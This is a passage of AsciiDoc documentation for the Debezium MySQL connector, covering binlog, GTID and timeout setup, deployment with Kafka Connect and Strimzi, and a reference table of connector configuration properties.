connector always requires this.\n\n|`ON`\n|Identifies the database to which the permissions apply.\n\n|`TO 'user'`\n|Specifies the user to grant the permissions to.\n\n|`IDENTIFIED BY 'password'`\n|Specifies the user's MySQL password.\n\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-the-mysql-binlog-for-debezium\n\/\/ Title: Enabling the MySQL binlog for {prodname}\n[[enable-mysql-binlog]]\n=== Enabling the binlog \n\nYou must enable binary logging for MySQL replication. The binary logs record transaction updates for replication tools to propagate changes. \n\n.Prerequisites\n\n* A MySQL server.\n* Appropriate MySQL user privileges.\n\n.Procedure\n\n. Check whether the `log-bin` option is already on:\n+\n[source,SQL]\n----\nmysql> SELECT variable_value as \"BINARY LOGGING STATUS (log-bin) ::\"\nFROM information_schema.global_variables WHERE variable_name='log_bin';\n----\n\n. If it is `OFF`, configure your MySQL server configuration file with the following properties, which are described in the table below:\n+\n[source,properties]\n----\nserver-id = 223344 \nlog_bin = mysql-bin \nbinlog_format = ROW \nbinlog_row_image = FULL \nexpire_logs_days = 10 \n----\n\n. Confirm your changes by checking the binlog status once more: \n+\n[source,SQL]\n----\nmysql> SELECT variable_value as \"BINARY LOGGING STATUS (log-bin) ::\"\nFROM information_schema.global_variables WHERE variable_name='log_bin';\n----\n\n[[binlog-configuration-properties-mysql-connector]]\n.Descriptions of MySQL binlog configuration properties\n[cols=\"1,4\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Description\n\n|`server-id`\n|The value for the `server-id` must be unique for each server and replication client in the MySQL cluster. During MySQL connector set up, {prodname} assigns a unique server ID to the connector.\n\n|`log_bin`\n|The value of `log_bin` is the base name of the sequence of binlog files.\n\n|`binlog_format`\n|The `binlog-format` must be set to `ROW` or `row`.\n\n|`binlog_row_image`\n|The `binlog_row_image` must be set to `FULL` or `full`.\n\n|`expire_logs_days`\n|This is the number of days for automatic binlog file removal. The default is `0`, which means no automatic removal. Set the value to match the needs of your environment. See {link-prefix}:{link-mysql-connector}#mysql-purges-binlog-files-used-by-debezium[MySQL purges binlog files].\n\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-mysql-gtids-for-debezium\n\/\/ Title: Enabling MySQL Global Transaction Identifiers for {prodname}\n[[enable-mysql-gtids]]\n=== Enabling GTIDs\n\nGlobal transaction identifiers (GTIDs) uniquely identify transactions that occur on a server within a cluster. Though not required for a {prodname} MySQL connector, using GTIDs simplifies replication and enables you to more easily confirm if primary and replica servers are consistent.\n\nGTIDs are available in MySQL 5.6.5 and later. See the link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for more details.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n. Enable `gtid_mode`:\n+\n[source,SQL]\n----\nmysql> gtid_mode=ON\n----\n\n. Enable `enforce_gtid_consistency`:\n+\n[source,SQL]\n----\nmysql> enforce_gtid_consistency=ON\n----\n\n. Confirm the changes:\n+\n[source,SQL]\n----\nmysql> show global variables like '%GTID%';\n----\n\n.Result\n[source,SQL]\n----\n+--------------------------+-------+\n| Variable_name | Value |\n+--------------------------+-------+\n| enforce_gtid_consistency | ON |\n| gtid_mode | ON |\n+--------------------------+-------+\n----\n\n.Descriptions of GTID options\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Option |Description\n\n|`gtid_mode`\na|Boolean that specifies whether GTID mode of the MySQL server is enabled or not.\n\n* `ON` = enabled\n* `OFF` = disabled\n\n|`enforce_gtid_consistency`\na|Boolean that specifies whether the server enforces GTID consistency by allowing the execution of statements that can be logged in a transactionally safe manner. Required when using GTIDs.\n\n* `ON` = enabled\n* `OFF` = disabled\n\n|===\n\n\n\/\/ Type: procedure\n\/\/ ModuleID: configuring-mysql-session-timeouts-for-debezium\n\/\/ Title: Configuring MySQL session timesouts for {prodname}\n[[mysql-session-timeouts]]\n=== Configuring session timeouts\n\nWhen an initial consistent snapshot is made for large databases, your established connection could timeout while the tables are being read. You can prevent this behavior by configuring `interactive_timeout` and `wait_timeout` in your MySQL configuration file.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n. Configure `interactive_timeout`:\n+\n[source,SQL]\n----\nmysql> interactive_timeout=<duration-in-seconds>\n----\n\n. Configure `wait_timeout`:\n+\n[source,SQL]\n----\nmysql> wait_timeout=<duration-in-seconds>\n----\n\n.Descriptions of MySQL session timeout options\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Option |Description\n\n|`interactive_timeout`\na|The number of seconds the server waits for activity on an interactive connection before closing it. See link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/server-system-variables.html#sysvar_interactive_timeout[MySQL's documentation] for more details.\n\n|`wait_timeout`\na|The number of seconds the server waits for activity on a non-interactive connection before closing it. See link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/server-system-variables.html#sysvar_wait_timeout[MySQL's documentation] for more details.\n\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-query-log-events-for-debezium-mysql-connectors\n\/\/ Title: Enabling query log events for {prodname} MySQL connectors\n[[enable-query-log-events]]\n=== Enabling query log events \n\nYou might want to see the original `SQL` statement for each binlog event. Enabling the `binlog_rows_query_log_events` option in the MySQL configuration file allows you to do this.\n\nThis option is available in MySQL 5.6 and later.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowlede of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n* Enable `binlog_rows_query_log_events`:\n+\n[source,SQL]\n----\nmysql> binlog_rows_query_log_events=ON\n----\n+\n`binlog_rows_query_log_events` is set to a value that enables\/disables support for including the original `SQL` statement in the binlog entry.\n+\n** `ON` = enabled\n** `OFF` = disabled\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-mysql-connectors\n\/\/ Title: Deploying {prodname} MySQL connectors\n[[mysql-deploying-a-connector]]\n== Deployment\n\nTo deploy a {prodname} MySQL connector, install the {prodname} MySQL connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. \n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:installing-debezium-mysql-connectors[]\n* xref:debezium-mysql-connector-configuration-example[]\n* xref:adding-debezium-mysql-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-mysql-connector-configuration-properties[]\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ Title: Installing {prodname} MySQL connectors\n[id=\"installing-debezium-mysql-connectors\"]\n=== Installing\n\nTo install a {prodname} MySQL connector, download the connector archive, extract it to your Kafka Connect environment, and ensure that the plug-ins parent directory is specified in your Kafka Connect environment.\n\n.Prerequisites\n\n* link:https:\/\/zookeeper.apache.org\/[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* MySQL Server is installed and set up for {prodname}.\n\n.Procedure\n\nifdef::product[]\n. Download the link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[{prodname} MySQL connector].\nendif::product[]\nifdef::community[]\nifeval::['{page-version}' == 'master']\n. Download the {prodname} link:{link-mysql-plugin-snapshot}[MySQL connector plug-in].\nendif::[]\nifeval::['{page-version}' != 'master']\n. Download the {prodname} link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mysql\/{debezium-version}\/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[MySQL connector plug-in].\nendif::[]\nendif::community[]\n. Extract the files into your Kafka Connect environment.\n. Add the plug-ins parent directory to your Kafka Connect `plugin.path`:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} MySQL connector into the `\/kafka\/connect\/debezium-connector-mysql` path.\n\n. Restart your Kafka Connect process. This ensures that the new JAR files are picked up.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-mysql-connector-configuration-example\n\/\/ Title: {prodname} MySQL connector configuration example\n[[mysql-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\nTypically, you configure a {prodname} MySQL connector in a `.json` file that sets configuration properties for the connector. Following is an example configuration for a MySQL connector that connects to a MySQL server on port 3306 at 192.168.99.100, whose logical name is `fullfillment`.\n\nFor details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"3306\", \/\/ <4>\n \"database.user\": \"debezium-user\", \/\/ <5>\n \"database.password\": \"debezium-user-pw\", \/\/ <6>\n \"database.server.id\": \"184054\", <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"database.whitelist\": \"inventory\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\", \/\/ <11>\n \"include.schema.changes\": \"true\" \/\/ <12>\n }\n}\n----\n<1> Connector's name when registered with the Kafka Connect service.\n<2> Connector's class name.\n<3> MySQL server address.\n<4> MySQL server port number.\n<5> MySQL user with the appropriate privileges.\n<6> MySQL user's password.\n<7> Unique ID of the connector.\n<8> Logical name of the MySQL server or cluster.\n<9> List of databases hosted by the specified server.\n<10> List of Kafka brokers that the connector uses to write and recover DDL statements to the database history topic.\n<11> Name of the database history topic. This topic is for internal use only and should not be used by consumers. \n<12> Flag that specifies if the connector should generate events for DDL changes and emit them to the `fulfillment` schema change topic for use by consumers. \nendif::community[]\n\nifdef::product[]\n\nTypically, you configure a {prodname} MySQL connector in a `.yaml` file that sets connector configuration properties. Following is an example of the configuration for a MySQL connector that connects to a MySQL server on port 3306 and captures changes to the `inventory` database. \nFor details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\n[source,yaml,options=\"nowrap\"]\n----\n apiVersion: kafka.strimzi.io\/v1beta1\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.mysql.MySqlConnector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: mysql \/\/ <4>\n database.port: 3306\n database.user: debezium\n database.password: dbz\n database.server.id: 184054 \/\/ <5>\n database.server.name: dbserver1 \/\/ <5>\n database.whitelist: inventory \/\/ <6>\n database.history.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 \/\/ <7>\n database.history.kafka.topic: schema-changes.inventory \/\/ <7>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\nBecause the MySQL connector reads the MySQL server\u2019s `binlog`,\nusing a single connector task ensures proper order and event handling.\nThe Kafka Connect service uses connectors to start one or more tasks that do the work,\nand it automatically distributes the running tasks across the cluster of Kafka Connect services.\nIf any of the services stop or crash,\nthose tasks will be redistributed to running services.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the name of the container running the MySQL server (`mysql`).\n\n|5\n|A unique server ID and name.\nThe server name is the logical identifier for the MySQL server or cluster of servers.\nThis name is used as the prefix for all Kafka topics.\n\n|6\n|Changes in only the `inventory` database are captured.\n\n|7\n|The connector stores the history of the database schemas in Kafka using this broker (the same broker to which you are sending events) and topic name.\nUpon restart, the connector recovers the schemas of the database that existed at the point in time in the binlog when the connector should begin reading.\n\n|===\n\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-mysql-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} MySQL connector configuration to Kafka Connect\n[[mysql-adding-configuration]]\n=== Adding connector configuration \nifdef::community[]\nTo start running a MySQL connector, configure a connector and add the configuration to your Kafka Connect cluster. \n\n.Prerequisites\n\n* {link-prefix}:{link-mysql-connector}#setting-up-mysql[MySQL server] is \nset up for a {prodname} connector.\n\n* {prodname} MySQL connector is installed. \n\n.Procedure\n\n. Create a configuration for the MySQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster. \n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} MySQL connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment. \n\n.Prerequisites\n\n* Podman or Docker is installed.\n* You have sufficient rights to create and manage containers.\n* You downloaded the {prodname} MySQL connector archive. \n\n.Procedure\n\n. Extract the {prodname} MySQL connector archive to create a directory structure for the connector plug-in, for example: \n+\n[subs=\"+macros\"]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-mysql\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-mysql`, then you would run the following command:\n+\n`podman build -t debezium-container-for-mysql:latest`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-mysql:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnector` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-mysql\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} MySQL connector instance. See {LinkDebeziumUserGuide}#mysql-example-configuration[the connector configuration example].\n\n. Apply the connector instance, for example: \n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines: \n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ... \n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-mysql-connector}#mysql-snapshots[performs a consistent snapshot] of the MySQL databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics. \n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-mysql-connector-configuration-properties\n\/\/ Title: Description of {prodname} MySQL connector configuration properties\n[[mysql-connector-properties]]\n=== Connector properties\n\nThe {prodname} MySQL connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:mysql-required-connector-configuration-properties[Required connector configuration properties]\n* xref:mysql-advanced-connector-configuration-properties[Advanced connector configuration properties]\n* xref:mysql-pass-through-configuration-properties[Pass-through configuration properties]\n\n[id=\"mysql-required-connector-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required MySQL connector configuration properties\n[cols=\"33%a,17%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Default |Description\n\n|[[mysql-property-name]]<<mysql-property-name, `name`>>\n|\n|Unique name for the connector. Attempting to register again with the same name fails. This property is required by all Kafka Connect connectors.\n\n|[[mysql-property-connector-class]]<<mysql-property-connector-class, `connector.class`>>\n|\n|The name of the Java class for the connector. Always specify `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.\n\n|[[mysql-property-tasks-max]]<<mysql-property-tasks-max, `tasks.max`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[mysql-property-database-hostname]]<<mysql-property-database-hostname, `database.hostname`>>\n|\n|IP address or host name of the MySQL database server.\n\n|[[mysql-property-database-port]]<<mysql-property-database-port, `database.port`>>\n|`3306`\n|Integer port number of the MySQL database server.\n\n|[[mysql-property-database-user]]<<mysql-property-database-user, `database.user`>>\n|\n|Name of the MySQL database to use when connecting to the MySQL database server.\n\n|[[mysql-property-database-password]]<<mysql-property-database-password, `database.password`>>\n|\n|Password to use when connecting to the MySQL database server.\n\n|[[mysql-property-database-server-name]]<<mysql-property-database-server-name, `database.server.name`>>\n|\n|Logical name that identifies and provides a namespace for the particular MySQL database server\/cluster in which {prodname} is capturing changes. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names that receive events emitted by this connector.\nOnly alphanumeric characters and underscores are allowed in this name.\n\n|[[mysql-property-database-server-id]]<<mysql-property-database-server-id, `database.server.id`>>\n|_random_\n|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number between 5400 and 6400 is generated, though the recommendation is to explicitly set a value. \n\n|[[mysql-property-database-history-kafka-topic]]<<mysql-property-database-history-kafka-topic, `database.history.kafka{zwsp}.topic`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[mysql-property-database-history-kafka-bootstrap-servers]]<<mysql-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>\n|\n|A list of host\/port pairs that the connector uses for establishing an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the Kafka Connect process.\n\n|[[mysql-property-database-whitelist]]\n[[mysql-property-database-include-list]]<<mysql-property-database-include-list, `database.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the names of the databases for which to capture changes. The connector does not capture changes in any database whose name is not in `database.include.list`. By default, the connector captures changes in all databases. \nDo not also set the `database.exclude.list` connector confiuration property.\n\n|[[mysql-property-database-blacklist]]\n[[mysql-property-database-exclude-list]]<<mysql-property-database-exclude-list, `database.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the names of databases for which you do not want to capture changes. The connector captures changes in any database whose name is not in the `database.exclude.list`. \nDo not also set the `database.include.list` connector configuration property.\n\n|[[mysql-property-table-whitelist]]\n[[mysql-property-table-include-list]]<<mysql-property-table-include-list, `table.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers of tables whose changes you want to capture. The connector does not capture changes in any table not included in `table.include.list`. Each identifier is of the form _databaseName_._tableName_. By default, the connector captures changes in every non-system table in each database whose changes are being captured.\nDo not also specify the `table.exclude.list` connector configuration property.\n\n|[[mysql-property-table-blacklist]]\n[[mysql-property-table-exclude-list]]<<mysql-property-table-exclude-list, `table.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want to capture. The connector captures changes in any table not included in `table.exclude.list`. Each identifier is of the form _databaseName_._tableName_.\nDo not also specify the `table.include.list` connector configuration property.\n\n|[[mysql-property-column-blacklist]]\n[[mysql-property-column-exclude-list]]<<mysql-property-column-exclude-list, `column.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event record values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-include-list]]<<mysql-property-column-include-list, `column.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to include in change event record values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-truncate-to-length-chars]]<<mysql-property-column-truncate-to-length-chars, `column.truncate.to{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event record values if the field values are longer than the specified number of characters. You can configure multiple properties with different lengths in a single configuration. The length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-with-length-chars]]<<mysql-property-column-mask-with-length-chars, `column.mask.with{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. You can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-hash]]<<mysql-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in the change event record values. Pseudonyms consist of the hashed value obtained by applying the algorithm `_hashAlgorithm_` and salt `_salt_`. +\n +\nBased on the hash function used, referential integrity is kept while data is pseudonymized. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash result is automatically shortened to the length of the column. +\n +\nYou can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName` +\n +\n`CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the configured `_hashAlgorithm_`, the selected `_salt_`, and the actual data set, the resulting masked data set might not be completely anonymized.\n\n|[[mysql-property-column-propagate-source-type]]<<mysql-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters: \n\n`pass:[_]pass:[_]{prodname}.source.column.type` \n\n`pass:[_]pass:[_]{prodname}.source.column.length` \n \n`pass:[_]pass:[_]{prodname}.source.column.scale` \n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of one of these forms: \n\n_databaseName_._tableName_._columnName_ \n\n_databaseName_._schemaName_._tableName_._columnName_\n\n|[[mysql-property-datatype-propagate-source-type]]<<mysql-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters: \n \n`pass:[_]pass:[_]debezium.source.column.type` \n\n`pass:[_]pass:[_]debezium.source.column.length`\n\n`pass:[_]pass:[_]debezium.source.column.scale` \n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified data type names are of one of these forms: \n\n_databaseName_._tableName_._typeName_ \n\n_databaseName_._schemaName_._tableName_._typeName_ \n \nSee {link-prefix}:{link-mysql-connector}#mysql-data-types[how MySQL connectors map data types] for the list of MySQL-specific data type names.\n\n|[[mysql-property-time-precision-mode]]<<mysql-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive_time{zwsp}_microseconds`\n|Time, date, and timestamps can be represented with different kinds of precision, including: +\n +\n`adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of TIME type fields, which are always captured as microseconds. +\n +\nifdef::community[]\n`adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\nendif::community[]\n +\n`connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which use millisecond precision regardless of the database columns' precision.\n\n|[[mysql-property-decimal-handling-mode]]<<mysql-property-decimal-handling-mode,`decimal.handling.mode`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[mysql-property-bigint-unsigned-handling-mode]]<<mysql-property-bigint-unsigned-handling-mode, `bigint.unsigned{zwsp}.handling.mode`>>\n|`long`\n|Specifies how BIGINT UNSIGNED columns should be represented in change events. Possible settings are: +\n +\n `long` represents values by using Java's `long`, which might not offer the precision but which is easy to use in consumers. `long` is usually the preferred setting. +\n +\n`precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events by using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type. Use this setting when working with values larger than 2^63, because these values cannot be conveyed by using `long`.\n\n|[[mysql-property-include-schema-changes]]<<mysql-property-include-schema-changes, `include.schema{zwsp}.changes`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded by using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history. \n\n|[[mysql-property-include-query]]<<mysql-property-include-query, `include.query`>>\n|`false`\n|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +\n +\nIf you set this option to `true` then you must also configure MySQL with the `binlog_rows_query_log_events` option set to `ON`. When `include.query` is `true`, the query is not present for events that the snapshot process generates. +\n +\nSetting `include.query`to `true` might expose tables or fields explicitly excluded or masked by including the original SQL statement in the change event. For this reason, the default setting is `false`.\n\n|[[mysql-property-event-processing-failure-handling-mode]]<<mysql-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling.mode`>>\n|`fail`\n|Specifies how the connector should react to exceptions during deserialization of binlog events. +\n +\n`fail` propagates the exception, which indicates the problematic event and its binlog offset, and causes the connector to stop. +\n +\n`warn` logs the problematic event and its binlog offset and then skips the event. +\n +\n`skip` passes over the problematic event and does not log anything.\n\n|[[mysql-property-inconsistent-schema-handling-mode]]<<mysql-property-inconsistent-schema-handling-mode, `inconsistent.schema{zwsp}.handling.mode`>>\n|`fail`\n|Specifies how the connector should react to binlog events that relate to tables that are not present in internal schema representation. That is, the internal representation is not consistent with the database. +\n +\n`fail` throws an exception that indicates the problematic event and its binlog offset, and causes the connector to stop. +\n +\n`warn` logs the problematic event and its binlog offset and skips the event. +\n +\n`skip` passes over the problematic event and does not log anything.\n\n|[[mysql-property-max-queue-size]]<<mysql-property-max-queue-size, `max.queue.size`>>\n|`8192`\n|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slow or if Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector. Defaults to 8192, and should always be larger than the maximum batch size specified by the `max.batch.size` property.\n\n|[[mysql-property-max-batch-size]]<<mysql-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|[[mysql-property-poll-interval-ms]]<<mysql-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[mysql-property-connect-timeout-ms]]<<mysql-property-connect-timeout-ms, `connect.timeout.ms`>>\n|`30000`\n|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.\n\n|[[mysql-property-gtid-source-includes]]<<mysql-property-gtid-source-includes, `gtid.source.includes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that match one of these include patterns are used.\nDo not also specify a setting for `gtid.source.excludes`.\n\n|[[mysql-property-gtid-source-excludes]]<<mysql-property-gtid-source-excludes, `gtid.source.excludes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that do not match any of these exclude patterns are used. Do not also specify a value for `gtid.source.includes`.\n\nifdef::community[]\n|[[mysql-property-gtid-new-channel-position]]<<mysql-property-gtid-new-channel-position, `gtid.new.channel.position`>> +\n_deprecated and scheduled for removal_\n|`earliest`\n|When set to `latest`, when the connector sees a new GTID channel, it starts consuming from the last executed transaction in that GTID channel. If set to `earliest` (default), the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have an active-passive MySQL setup where {prodname} is connected to the primary server. In this case, during failover, the replica with the new UUID (and GTID channel) starts receiving writes before {prodname} is connected. These writes would be lost when using `latest`.\nendif::community[]\n\n|[[mysql-property-tombstones-on-delete]]<<mysql-property-tombstones-on-delete, `tombstones.on.delete`>>\n|`true`\n|Controls whether 